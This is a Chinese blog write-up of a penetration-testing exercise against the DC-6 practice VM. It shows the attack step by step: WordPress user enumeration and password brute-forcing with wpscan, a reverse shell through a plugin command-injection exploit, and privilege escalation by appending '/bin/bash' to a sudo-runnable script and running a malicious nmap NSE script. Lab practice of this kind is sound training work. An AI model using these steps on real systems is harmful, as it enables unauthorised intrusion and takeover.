dc6打靶报告

Le_ee 博客等级 码龄1年 Lv3
环境:kali ip:192.168.145.128

arp-scan -l 发现存活靶机IP: 192.168.145.188

nmap -A -sV -p- 192.168.145.188 扫描端口

发现开放端口:22(SSH)、80(HTTP),并提示域名 wordy

然后进行域名解析,因为80端口重定向到 http://wordy,需本地解析

vim /etc/hosts 添加: 192.168.145.188 wordy

whatweb扫一下确定cms是wordpress

然后进行 信息收集

wpscan –url http://wordy –enumerate u –no-update

得到用户表

admin, mark, graham, sarah, jens

官网有个小提示

cat /usr/share/wordlists/rockyou.txt | grep k01 > ps.txt

生成密码文件 password.txt

然后创建一个user列表文件,把刚刚我们扫到的用户名存进去

开始爆破

wpscan --url http://wordy -U user.txt -P ps.txt

得到一组结果: mark:helpdesk01

登陆成功

发现一个Activity on Wordy插件

百度一下发现Activity Monitor插件存在命令注入,searchsploit扫一下看有没有执行脚本

45274.html,html程序运行更简单,先试试这个

Kali监听: nc -lvnp 1234

修改脚本中几个地方——靶机地址,攻击ip,攻击机开放端口

Kali监听: nc -lvnp 4443

浏览器打开45274.html并提交,获得反向Shell

file:///tmp/45274.html

权限提升(横向移动)——先从mark用户提权至其他用户

python伪终端

在/home/mark目录发现文件: /home/mark/things-to-do.txt

得到一组密码信息,graham密码: GSo7isUM1D4

SSH登录: ssh graham@192.168.145.188

继续权限提升(纵向提权)——从graham提权至root

sudo -l 发现jens可执行 /home/jens/backups.sh

向backups.sh注入命令:

echo '/bin/bash' >> /home/jens/backups.sh

切换用户: sudo -u jens ./backups.sh → 获得jens Shell

sudo -l 发现jens可执行nmap

创建恶意nse脚本: echo 'os.execute("/bin/sh")' > kali.nse

sudo nmap --script=kali.nse → 获得root Shell

完结撒花!!!!!

  • Title: dc6打靶报告
  • Author: Le_ee 博客等级 码龄1年
  • Created at : 2026-01-28 07:31:22
  • Updated at : 2026-02-05 10:51:06
  • Link: https://leei.site/2026/01/28/dc系列——dc6/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
dc6打靶报告